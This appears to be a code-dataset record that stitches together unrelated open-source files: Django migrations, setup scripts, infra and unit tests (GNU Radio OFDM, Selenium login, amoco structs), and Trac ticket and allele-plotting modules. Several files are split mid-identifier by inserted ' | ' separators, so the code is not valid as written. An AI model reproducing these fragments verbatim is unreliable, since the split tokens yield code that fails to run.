self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Adding field 'Task.sequence'
db.add_column(u'damis_task', 'sequence',
self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
keep_default=False)
# Adding field 'Task.stderr'
db.add_column(u'damis_task', 'stderr',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
# Adding field 'Task.stdout'
db.add_column(u'damis_task', 'stdout',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
# Adding field 'Task.processors'
db.add_column(u'damis_task', 'processors',
self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
keep_default=False)
# Deleting field 'Task.is_workflow_start'
db.delete_column(u'damis_task', 'is_workflow_start')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'damis.algorithm': {
'Meta': {'object_name': 'Algorithm'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
| 'executable_file': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_le | ngth': '100'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'damis.dataset': {
'Meta': {'object_name': 'Dataset'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'license': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['damis.License']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'damis.experiment': {
'Meta': {'object_name': 'Experiment'},
'finish': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'CREATED'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'experiments'", 'null': 'True', 'to': u"orm['auth.User']"}),
'workflow_state': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'damis.license': {
'Meta': {'object_name': 'License' |
SalesforceFoundation/mrbelvedereci | metaci/plan/migrations/0017_merge_20180911_1915.py | Python | bsd-3-clause | 329 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-09-11 19:15
from __ | future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencie | s = [
("plan", "0016_plan_test_dashboard"),
("plan", "0016_auto_20180904_1457"),
]
operations = []
|
iglpdc/dmrg_helpers | setup.py | Python | mit | 912 | 0.048246 | #!/usr/bin/env python
from distutils.core import setup
from version import __version__
setup(name='dmrg_helpers',
version=__version__,
description='Python helpers from our main DMRG code',
long_description=open('README.md').read(),
author='Ivan Gonzalez',
author_email='iglpdc@gmail.com',
url='https://github.com/iglpdc/dmrg_helpers',
license='MIT',
classifiers=[
'Enviroment :: Console',
'Development Status :: 0 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Sc | ience/Research',
'License :: OSI Approved :: MIT license',
'Natural language :: English',
'Programming Language:: Python',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Physics',
],
# list all subdirectories in next lis | t
packages = ['dmrg_helpers', 'NAME.core',
'dmrg_helpers.utils'],
py_modules = ['version'],
requires = [],
)
|
HalCanary/skia-hc | infra/bots/infra_tests.py | Python | bsd-3-clause | 1,839 | 0.014138 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run all infrastructure-related tests."""
import os
import subprocess
import sys
INFRA_BOTS_DIR = os.pa | th.dirname(os.path.realpath(__file__))
SKIA_DIR = os.path.abspath(os.path.join(INFRA_BOTS_DIR, os.pardir, os.pardir))
def test(cmd, cwd):
try:
subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
return e.output
def python_unit_tests(train):
if train:
return | None
return test(
['python', '-m', 'unittest', 'discover', '-s', '.', '-p', '*_test.py'],
INFRA_BOTS_DIR)
def recipe_test(train):
cmd = [
'python', os.path.join(INFRA_BOTS_DIR, 'recipes.py'), 'test']
if train:
cmd.append('train')
else:
cmd.append('run')
return test(cmd, SKIA_DIR)
def gen_tasks_test(train):
cmd = ['go', 'run', 'gen_tasks.go']
if not train:
cmd.append('--test')
try:
output = test(cmd, INFRA_BOTS_DIR)
except OSError:
return ('Failed to run "%s"; do you have Go installed on your machine?'
% ' '.join(cmd))
return output
def main():
train = False
if '--train' in sys.argv:
train = True
tests = (
python_unit_tests,
recipe_test,
gen_tasks_test,
)
errs = []
for t in tests:
err = t(train)
if err:
errs.append(err)
if len(errs) > 0:
print >> sys.stderr, 'Test failures:\n'
for err in errs:
print >> sys.stderr, '=============================='
print >> sys.stderr, err
print >> sys.stderr, '=============================='
sys.exit(1)
if train:
print 'Trained tests successfully.'
else:
print 'All tests passed!'
if __name__ == '__main__':
main()
|
victorgama/todo | todo/itemlist.py | Python | mit | 1,776 | 0.007883 | import collections
import sys
from .parser import Parser
from .item import Item
class ItemList(object):
items = []
def __init__(self, path=None):
if path:
self.path = path
self.items = Parser.parse(path)
def append(self, *args):
for item in args:
if isinstance(item, Item):
self.items.append(item)
def update(self, item):
self.items[self.items.index(item)] = item
def replace(self, old, new):
self.items[self.items.index(old)] = new
return new
def prepend(self, item):
self.items.insert(0, item)
def index(self, item):
dic = self.dict
for index in dic:
if dic[index] == item:
return index
def build_file(self):
f = ""
for item in self.items:
f += item.to_text()
with open(self.path, 'w') as io:
io.write(f)
io.close()
def dele | te(self, item):
if isinstance(item, collections.Iterab | le):
item = item[1]
self.items.remove(item)
def get(self, index, default=None):
return self.dict.get(index, default)
def get_or_die(self, index):
item = self.get(index)
if not item:
print('[Ops! There is no todo #{}]'.format(index))
sys.exit(0)
else:
return item
@property
def undone(self):
return [item for item in self.all if not item[1].done]
@property
def all(self):
return [(self.items.index(item) + 1, item) for item in self.items]
@property
def dict(self):
dic = {}
for item in self.items:
dic[self.items.index(item) + 1] = item
return dic
|
byakatat/selenium-training | test_login.py | Python | apache-2.0 | 586 | 0.006826 | import pyte | st
from selenium import webdriver
@pytest.fixture
def driver(request):
wd = webdriver.Firefox(capabilities={"marionette": True})
#(desired_capabilities={"chromeOptions": {"args": ["--start-fullscreen"]}})
request.addfinalizer(wd.quit)
return wd
def test_exampl | e(driver):
driver.get("http://localhost/litecart/admin/")
driver.find_element_by_xpath("//input[@name='username']").send_keys("admin")
driver.find_element_by_xpath("//input[@name='password']").send_keys("admin")
driver.find_element_by_xpath("//button[@name='login']").click()
|
trmznt/msaf | msaf/lib/tools/allele.py | Python | lgpl-3.0 | 7,523 | 0.026718 |
from collections import defaultdict
from matplotlib import pyplot as plt
from matplotlib.ticker import MultipleLocator
import numpy as np
from msaf.models import Marker
def summarize_alleles2( analytical_sets, temp_dir = None ):
""" return a tuple of (report, plot)
"""
allele_plots = {}
allele_reports = {}
for analytical_set in analytical_sets:
allele_df = analytical_set.get_allele_df()
report, plot = summarize_alleles3( allele_df )
allele_reports[ analytical_set.get_label() ] = report
allele_plots[ analytical_set.get_colour() ] = plot
# create plots
if temp_dir:
plot_file = make_allele_plot2( allele_plots, temp_dir + 'allele_plot.pdf',
analytical_sets )
else:
plot_file = None
return (allele_reports, plot_file)
def summarize_alleles3( allele_df ):
""" return a tuple of (dict, dict):
1dict: alleles: [ (allele, freq, count, mean_height, min_size, max_size, delta), ...]
2dict: marker: ( [ size, ...], [ height, ....] )
"""
allele_list = defaultdict(list)
allele_plot = defaultdict(lambda x = None: ([], []))
grouped = allele_df.groupby( ['marker_id', 'value'] )
for (marker_id, allele), df in grouped:
allele_list[marker_id].append(
(allele, len(df), np.mean( df['height'] ), min(df['size']), max(df['size']),
list(df['sample_id']), np.mean( df['size'] ))
)
code = Marker.get(marker_id).code
allele_plot[code][0].extend( df['size'] )
allele_plot[code][1].extend( df['height'] )
# calculate other stuff
results = {}
for marker_id in allele_list:
alleles = allele_list[marker_id]
total_allele = sum( x[1] for x in alleles )
allele_params = [
(allele, count/total_allele, count, mean_height, min_size, max_size,
max_size - min_size, sample_ids, mean_size )
for (allele, count, mean_height, min_size, max_size, sample_ids, mean_size )
in alleles
]
delta_status = check_delta( allele_params)
results[marker_id] = dict(
code = Marker.get(marker_id).code,
unique_allele = len(allele_params),
total_allele = total_allele,
alleles = allele_params,
delta_status = delta_status )
return (results, allele_plot)
def make_allele_plot2( data_plots, filename, analytical_sets = None ):
n = len(data_plots) # number of distinct colors
markers = set() # number of markers
for d in data_plots:
markers.update( list(data_plots[d].keys()) )
m = len(markers) + 1
fig = plt.figure( figsize=(21, 4 * m), dpi=600 )
axes = []
for idx, marker in enumerate( sorted(markers) ):
ax = fig.add_subplot( m, 1, idx + 1 )
for colour in data_plots:
data = data_plots[colour][marker]
ax.vlines( data[0], [0], data[1], colors = [ colour ] )
ax.get_xaxis().set_tick_params( which='both', direction='out' )
ax.get_yaxis().set_tick_params( which='both', direction='out' )
minor_locator = MultipleLocator(1)
major_locator = MultipleLocator(5)
ax.get_xaxis().set_major_locator( major_locator )
ax.get_xaxis().set_minor_locator( minor_locator )
for label in ax.get_xticklabels():
label.set_size( 'xx-small' )
for label in ax.get_yticklabels():
label.set_size( 'xx-small' )
ax.set_ylabel( marker )
ax.set_ylim(0)
#ax.set_xlim(min(data[0]), max(data[0]))
ax.set_xlim(auto = True)
axes.append( ax )
# create the legend plot by creating dummy
if analytical_sets:
lx = fig.add_subplot( m, 1, m )
for analytical_set in analytical_sets:
lx.vlines( [0,0], [0], [0,0],
colors = [ analytical_set.get_colour() ],
label = analytical_set.get_label() )
leg = lx.legend(ncol = n )
#lx.set_ylabel( 'Legend' )
lx.set_axis_off()
fig.tight_layout()
fig.savefig( filename )
plt.close()
return filename
def summarize_alleles_xxx( allele_df, temp_dir = None ):
""" return a dict containing:
alleles: [ (allele, freq, count, mean_height, min_size, max_size, delta), ...]
"""
allele_list = defaultdict(list)
allele_plot = defaultdict(lambda x = None: ([], []))
grouped = allele_df.groupby( ['marker_id', 'value'] )
for (marker_id, allele), df in grouped:
allele_list[marker_id].append(
(allele, len(df), np.mean( df['height'] ), min(df['size']), max(df['size']), list(df['sample_id']))
)
if temp_dir:
code = Marker.get(marker_id).code
allele_plot[code][0].extend( df['size'] )
allele_plot[code][1].extend( df['height'] )
# calculate other stuff
results = {}
for marker_id in allele_list:
alleles = allele_list[marker_id]
total_allele = sum( x[1] for x in alleles )
allele_params = [
(allele, count/total_allele, count, mean_height, min_size, max_size,
max_size - min_size, sample_ids )
for (allele, count, mean_height, min_size, max_size, sample_ids) in alleles ]
delta_status = check_delta( allele_params)
results[marker_id] = dict(
code = Marker.get(marker_id).code,
unique_allele = len(allele_params),
total_allele = total_allele,
alleles = allele_params,
delta_status = delta_status )
if temp_dir:
plot_file = make_allele_plot( allele_plot, temp_dir + 'allele_plot.pdf' )
else:
plot_file = None
return (results, plot_file)
def check_delta( alleles ):
# check if only single allele
if len(alleles) <= 1:
return [ True ]
threshold = 1
delta_status = []
if alleles[1][0] - alleles[0][0] <= threshold:
delta_status.append( False )
el | se:
delta_status.append( True )
for i in range(1, len(alleles) - 1):
if ( alleles[i][0] - alleles[i-1][0] <= threshold or
| alleles[i+1][0] - alleles[i][0] <= threshold ):
delta_status.append( False )
else:
delta_status.append( True )
if alleles[-2][0] - alleles[-1][0] == 1:
delta_status.append( False )
else:
delta_status.append( True )
return delta_status
def make_allele_plot( data_plots, filename ):
n = len(data_plots)
fig = plt.figure( figsize=(21, 4 * n), dpi=600 )
axes = []
for idx, key in enumerate( sorted(data_plots) ):
data = data_plots[key]
ax = fig.add_subplot( n, 1, idx )
ax.vlines( data[0], [0], data[1] )
ax.get_xaxis().set_tick_params( which='both', direction='out' )
ax.get_yaxis().set_tick_params( which='both', direction='out' )
minor_locator = MultipleLocator(1)
major_locator = MultipleLocator(5)
ax.get_xaxis().set_major_locator( major_locator )
ax.get_xaxis().set_minor_locator( minor_locator )
for label in ax.get_xticklabels():
label.set_size( 'xx-small' )
for label in ax.get_yticklabels():
label.set_size( 'xx-small' )
ax.set_ylabel( key )
axes.append( ax )
fig.savefig( filename )
plt.close()
return filename
|
trabucayre/gnuradio | gr-digital/python/digital/qa_ofdm_chanest_vcvc.py | Python | gpl-3.0 | 13,180 | 0.004325 | #!/usr/bin/env python
# Copyright 2012-2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
import sys
import numpy
import random
import numpy
from gnuradio import gr, gr_unittest, blocks, analog, digital
import pmt
def shift_tuple(vec, N):
""" Shifts a vector by N elements. Fills up with zeros. """
if N > 0:
return (0,) * N + tuple(vec[0:-N])
else:
N = -N
return tuple(vec[N:]) + (0,) * N
def rand_range(min_val, max_val):
""" Returns a random value (uniform) from the interval min_val, max_val """
return random.random() * (max_val - min_val) + min_val
class qa_ofdm_chanest_vcvc (gr_unittest.TestCase):
def setUp (self):
random.seed(0)
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_offset_2sym (self):
""" Add a frequency offset, check if it's correctly detected.
Also add some random tags and see if they come out at the correct
position. """
fft_len = 16
carr_offset = -2
sync_symbol1 = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
sync_symbol2 = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
tx_data = shift_tuple(sync_symbol1, carr_offset) + \
shift_tuple(sync_symbol2, carr_offset) + \
shift_tuple(data_symbol, carr_offset)
tag1 = gr.tag_t()
tag1.offset = 0
tag1.key = pmt.string_to_symbol("test_tag_1")
tag1.value = pmt.from_long(23)
tag2 = gr.tag_t()
tag2.offset = 2
tag2.key = pmt.string_to_symbol("test_tag_2")
tag2.value = pmt.from_long(42)
src = blocks.vector_source_c(tx_data, False, fft_len, (tag1, tag2))
chanest = digital.ofdm_chanest_vcvc(sync_symbol1, sync_symbol2, 1)
sink = blocks.vector_sink_c(fft_len)
self.tb.connect(src, chanest, sink)
self.tb.run()
self.assertEqual(shift_tuple(sink.data(), -carr_offset), data_symbol)
tags = sink.tags()
ptags = {}
for tag in tags:
ptag = gr.tag_to_python(tag)
ptags[ptag.key] = (ptag.value, ptag.offset)
if ptag.key == 'ofdm_sync_chan_taps':
ptags[ptag.key] = (None, ptag.offset)
expected_tags = {
'ofdm_sync_carr_offset': (-2, 0),
'ofdm_sync_chan_taps': (None, 0),
'test_tag_1': (23, 0),
'test_tag_2': (42, 0),
}
self.assertEqual(ptags, expected_tags)
def test_002_offset_1sym (self):
""" Add a frequency offset, check if it's correctly detected.
| Difference to previous test is, it only uses one synchronisation symbol. """
fft_len = 16
carr_offset = -2
# This will not correct for +2 because it thinks carrier 14 is used
# (because of interpolation)
sync_symbol = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
tx_data = shift_tuple(sync_symbol, carr_offs | et) + \
shift_tuple(data_symbol, carr_offset)
src = blocks.vector_source_c(tx_data, False, fft_len)
# 17 is out of bounds!
chanest = digital.ofdm_chanest_vcvc(sync_symbol, (), 1, 0, 17)
sink = blocks.vector_sink_c(fft_len)
self.tb.connect(src, chanest, sink)
self.tb.run()
self.assertEqual(shift_tuple(sink.data(), -carr_offset), data_symbol)
tags = sink.tags()
for tag in tags:
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
carr_offset_hat = pmt.to_long(tag.value)
self.assertEqual(pmt.to_long(tag.value), carr_offset)
def test_003_channel_no_carroffset (self):
""" Add a channel, check if it's correctly estimated """
fft_len = 16
carr_offset = 0
sync_symbol1 = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
sync_symbol2 = (0, 0, 0, 1j, -1, 1, -1j, 1j, 0, 1, -1j, -1, -1j, 1, 0, 0)
data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
tx_data = sync_symbol1 + sync_symbol2 + data_symbol
channel = [0, 0, 0, 2, -2, 2, 3j, 2, 0, 2, 2, 2, 2, 3, 0, 0]
src = blocks.vector_source_c(tx_data, False, fft_len)
chan = blocks.multiply_const_vcc(channel)
chanest = digital.ofdm_chanest_vcvc(sync_symbol1, sync_symbol2, 1)
sink = blocks.vector_sink_c(fft_len)
sink_chanest = blocks.vector_sink_c(fft_len)
self.tb.connect(src, chan, chanest, sink)
self.tb.connect((chanest, 1), sink_chanest)
self.tb.run()
tags = sink.tags()
self.assertEqual(shift_tuple(sink.data(), -carr_offset), tuple(numpy.multiply(data_symbol, channel)))
for tag in tags:
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
self.assertEqual(pmt.to_long(tag.value), carr_offset)
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_chan_taps':
self.assertEqual(pmt.c32vector_elements(tag.value), channel)
self.assertEqual(sink_chanest.data(), channel)
def test_004_channel_no_carroffset_1sym (self):
""" Add a channel, check if it's correctly estimated.
Only uses 1 synchronisation symbol. """
fft_len = 16
carr_offset = 0
sync_symbol = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
tx_data = sync_symbol + data_symbol
channel = [0, 0, 0, 2, 2, 2, 2, 3, 3, 2.5, 2.5, -3, -3, 1j, 1j, 0]
#channel = (0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
src = blocks.vector_source_c(tx_data, False, fft_len)
chan = blocks.multiply_const_vcc(channel)
chanest = digital.ofdm_chanest_vcvc(sync_symbol, (), 1)
sink = blocks.vector_sink_c(fft_len)
sink_chanest = blocks.vector_sink_c(fft_len)
self.tb.connect(src, chan, chanest, sink)
self.tb.connect((chanest, 1), sink_chanest)
self.tb.run()
self.assertEqual(sink_chanest.data(), channel)
tags = sink.tags()
for tag in tags:
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
self.assertEqual(pmt.to_long(tag.value), carr_offset)
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_chan_taps':
self.assertEqual(pmt.c32vector_elements(tag.value), channel)
def test_005_both_1sym_force (self):
""" Add a channel, check if it's correctly estimated.
Only uses 1 synchronisation symbol. """
fft_len = 16
carr_offset = 0
sync_symbol = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
ref_symbol = (0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0)
data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
tx_data = sync_symbol + data_symbol
channel = [0, 0, 0, 2, 2, 2, 2.5, 3, 2.5, 2, 2.5, 3, 2, 1, 1, 0]
src = blocks.vector_source_c(tx_data, False, fft_len)
chan = blocks.multiply_const_vcc(channel)
chanest = digital.ofdm_chanest_vcvc(sync_symbol, ref_symbol, 1)
sink = blocks.vector_sink_c(fft_len)
self.tb.connect(src, chan, chanest, sink)
self.tb.run()
tags = sink.tags()
for tag in tags:
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
self.assertEqual(pmt.to_long(tag.value), carr_offset)
if pmt.symbol_to_string(tag.key) == 'ofdm_sync_chan_taps':
self.assertEqual(pmt.c32vector_elements(tag.value), channel)
def test_006_channel_and_carroffset (self):
""" Add a channel, check if it's correctly estimated """
fft_len = 16
carr_offset = 2
# Index 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
sync_symbol1 = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, |
helixyte/tractor | tractor/ticket.py | Python | mit | 15,619 | 0.002945 | """
This file is part of the tractor library.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Jan 06, 2012.
"""
__docformat__ = 'reStructuredText en'
__all__ = ['create_wrapper_for_ticket_creation',
'create_wrapper_for_ticket_update',
'TicketWrapper'
'TicketAttribute',
'TicketAttributeValues',
'SummaryAttribute',
'ReporterAttribute',
'OwnerAttribute',
'DescriptionAttribute',
'TypeAttribute',
'StatusAttribute',
'PriorityAttribute',
'MilestoneAttribute',
'ComponentAttribute',
'VersionAttribute',
'SeverityAttribute',
'ResolutionAttribute',
'KeywordsAttribute',
'CcAttribute',
'ATTRIBUTE_NAMES',
'ATTRIBUTE_OPTIONS']
def create_wrapper_for_ticket_creation(summary, description, **kw):
"""
You can use this method to create a ticket wrapper that contains
all data required for a trac ticket creation.
The following keywords are optional:
* cc
* component
* keywords
* milestone
* owner
* priority
* reporter
* resolution
* severity
* status
* type
* version
"""
return TicketWrapper(summary=summary,
description=description,
**kw)
def create_wrapper_for_ticket_update(ticket_id, **kw):
"""
You can use this method to create a ticket wrapper that contains
all data required for a trac ticket update.
The following keywords are optional:
* cc
* component
* description
* keywords
* milestone
* owner
* priority
* reporter
* resolution
* severity
* status
* summary
* type
* version
"""
return TicketWrapper(ticket_id=ticket_id, **kw)
class TicketWrapper(object):
"""
Convenience class for ticket data.
"""
def __init__(self, ticket_id=None,
summary=None,
description=None,
reporter=None,
owner=None,
cc=None,
type=None, #pylint: disable=W0622
status=None,
priority=None,
milestone=None,
component=None,
severity=None,
resolution=None,
version=None,
keywords=None,
time=None,
changetime=None,
attribute_names_lookup=None,
attribute_options_lookup=None) | :
"""
Constructor for ticket wrappers. All arguments are optional.
However, if you are going to create a new trac ticket for the trac, you
must at least pass t | he following arguments:
* summary
* description
If you are going to update an existing trac ticket, you have to pass
at least the ticket ID.
:param attribute_names_lookup and attribute_options_lookup:
These lookup serve the association of attribute names with
attribute classes and valid option classes. If you do not
specify a lookup, the ticket object will use the default
lookups (ATTRIBUTE_NAMES and ATTRIBUTE_OPTIONS) instead.
"""
self.ticket_id = ticket_id
self.summary = summary
self.description = description
self.reporter = reporter
self.owner = owner
self.cc = cc
self.type = type
self.status = status
self.priority = priority
self.severity = severity
self.resolution = resolution
self.milestone = milestone
self.component = component
self.keywords = keywords
self.version = version
self.time = time
self.changetime = changetime
if attribute_names_lookup is None:
attribute_names_lookup = ATTRIBUTE_NAMES
#: Used to find the ticket attribute classes for attribute names.
self.__attribute_names_lookup = attribute_names_lookup
if attribute_options_lookup is None:
attribute_options_lookup = ATTRIBUTE_OPTIONS
#: Used to find valid options for attributes with limited value ranges.
self.__attribute_options_lookup = attribute_options_lookup
@classmethod
def create_from_trac_data(cls, trac_ticket_data):
"""
Converts the trac ticket return value into a :class:`TicketWrapper` object.
"""
ticket = TicketWrapper(ticket_id=trac_ticket_data[0],
time=trac_ticket_data[1],
changetime=trac_ticket_data[2])
for attr_name, attr_value in trac_ticket_data[3].iteritems():
if attr_value == '':
attr_value = None
setattr(ticket, attr_name, attr_value)
return ticket
def check_attribute_validity(self, attribute_name, value=None):
"""
Checks whether a non-optional attribute is present and
whether each value is a valid option (used before ticket creation
and update).
:raises AttributeError: In case of invalid attribute name.
:raises ValueError: In case of an invalid value.
"""
if value is None:
value = getattr(self, attribute_name)
attr_cls = self.__attribute_names_lookup[attribute_name]
options = self.__attribute_options_lookup[attribute_name]
if value is None:
if not attr_cls.IS_OPTIONAL:
if options is None:
msg = 'The value for a %s attribute must not be None!' \
% (attribute_name)
raise ValueError(msg)
elif not value in options.ALL:
msg = 'Invalid value "%s" for attribute %s. Valid ' \
'options are: %s.' % (value, attribute_name,
options.ALL)
raise ValueError(msg)
else:
if not options is None and not value in options.ALL:
msg = 'Invalid value "%s" for attribute %s. Valid options ' \
'are: %s.' % (value, attribute_name, options.ALL)
raise ValueError(msg)
def get_value_map_for_ticket_creation(self):
"""
Returns a value map for ticket creation - non-optional attribute
with None value will be set to their DEFAULT_VALUE.
"""
value_map = dict()
for attr_name, attr_cls in self.__attribute_names_lookup.iteritems():
value = getattr(self, attr_name)
# Summary and description must be passed as extra arguments.
if attr_name == SummaryAttribute.NAME or \
attr_name == DescriptionAttribute.NAME:
self.check_attribute_validity(attr_name)
continue
if value is None:
if attr_cls.IS_OPTIONAL:
continue
else:
value = attr_cls.DEFAULT_VALUE
self.check_attribute_validity(attr_name, value)
if not value is None:
value_map[attr_name] = value
return value_map
def get_value_map_for_update(self):
"""
Returns a value map containing the value for all set attributes.
"""
value_map = dict()
for attr_name in self.__attribute_names_lookup.keys():
value = getattr(self, attr_name)
if not value is None:
self.check_attribute_validity(attr_name, value)
value_map[attr_name] = value
return value_map
def __eq__(self, other):
"""
Within one realm, tickets are equal if their ID is equal.
"""
return isinstance(other, self.__class__) and \
self.ticket_id == other.ticket_id
def __ne__(self, other):
"""
Wi |
LRGH/amoco | tests/test_system_structs.py | Python | gpl-2.0 | 3,557 | 0.016025 | import pytest
from amoco.system.structs import *
def test_rawfield():
f = RawField('I',fcount=2,fname='v')
assert f.format()=='2I'
assert f.size()==8
assert f.unpack(b'\0\x01\x02\x03AAAA') == (0x03020100,0x41414141)
def test_varfield():
f = VarField('s',fname='string')
assert f.format()=='#s'
assert f.size()==float('Infinity')
assert f.unpack(b'abcdef\0 | dzdfoihzdofh') == b'abcdef\x00'
assert f.size()==7
assert f.format()=='7s'
def test_cntfield():
f = CntField('s','~b',fname='bstr')
assert f.format()=='#s'
assert f.size()==float('Infinity')
assert f.unpack(b'\x04abcdefgh') == b'abcd'
assert f.size()==5
assert f.format()=='b4s'
def test_StructDefine():
S = StructDefine("B : v")(type('S',(StructCore,),{}))
a = S()
b = S()
assert not (a.fields is b.fields)
a.packed = | True
assert S.packed == False
assert b.packed == False
assert a.packed == True
a.unpack(b'\x01')
b.unpack(b'\x02')
assert a.v == 1
assert b.v == 2
def test_UnionDefine():
pass
